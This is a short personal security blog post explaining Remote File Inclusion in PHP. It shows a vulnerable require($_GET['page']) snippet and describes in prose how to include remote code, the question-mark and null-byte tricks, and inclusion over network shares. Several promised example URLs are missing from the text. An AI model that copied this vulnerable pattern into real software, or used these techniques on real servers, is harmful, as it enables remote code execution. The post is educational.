Remote File Incluson
Seriously. RFI's are outdated, really outdated.
But I can't possible release an article of exploiting LFI's without releasing one about RFI's.
It's like saying A without saying B, and that is just plain annoying.
Okay, now on to it.
Before i get started, just to point out; RFI = Remote File Inclusion. Period.
Say a developer made a page containing code similar to this:
<? require($_GET['page'].'.php'); ?>
His intention might have been to just include his fancy-pants cooperate "About-Us" page.
However, on older versions of Apache / PHP, it was allowed that by default, remote pages could be included without any restrictions. Yes. Harmful right?
Say this developers URL looked like this:
With some basic tampering of the page-variable, the attacker (malicious employee?)
could with great success simply change About-Us to let's say;
...or...
The developers code would simply append .php to the end of the "path", and start including it.
Through that flaw, the evil employee's code would get executed on the corporations server.
Notice that the employee's code was written in a text file.
The only reason he did that, was so when the corporations server went away to the get the remote code at the employee's,
it would stay untouched and unexecuted by the employees server.
As in, if the employee would have saved it as .php at his server, his code would just get executed on his own server when the cooperation requested it.
He would simply exploit himself.
The other two various tricks the employee used, was the usage of the question-mark and the Poison Null Byte method (as mentioned in the LFI post).
The question-mark took the developers .php appending from the include, and made it a variable in the future request towards the employee's own server, like this:
As mentioned before. The null-byte is used to terminate strings (among other stuff), which in some conditions would have worked just as good as the question mark.
The requested string would get cut off by Apache / PHP at the location of the null-byte, and the request would have taken action.
That's about it. No fancy tricks.
...
Okay, one then.
You don't have to include pages over HTTP.
Think... Network Shares?
Try include;
You got the grip of it now, other protocols might work (have worked) just as well, it's for you to discover.
Ciao bella.
RFI-Locations:
http://ha.ckers.org/weird/rfi-locations.dat
Mirror:
http://h.ackack.net/download/miscellaneous-mirrors/text-files/rfi-locations-dat
Hey, I'm Fredrik. I'm from Sweden, born 1990, and I got a huge interest for information technology and information security. So far, I've been studying for three years at the Internation IT College of Sweden and one year at the Royal Institute of Technology (Kista, Sweden). I'm one of the Co-Founders of Detectify. I'm working closely together with the swedish firm Young & Skilled. ...Not to forget, I'm the previous founder of Arctic Security. If you wish to contact me, please email me at h@ackack.net or follow me on twitter @Almroot.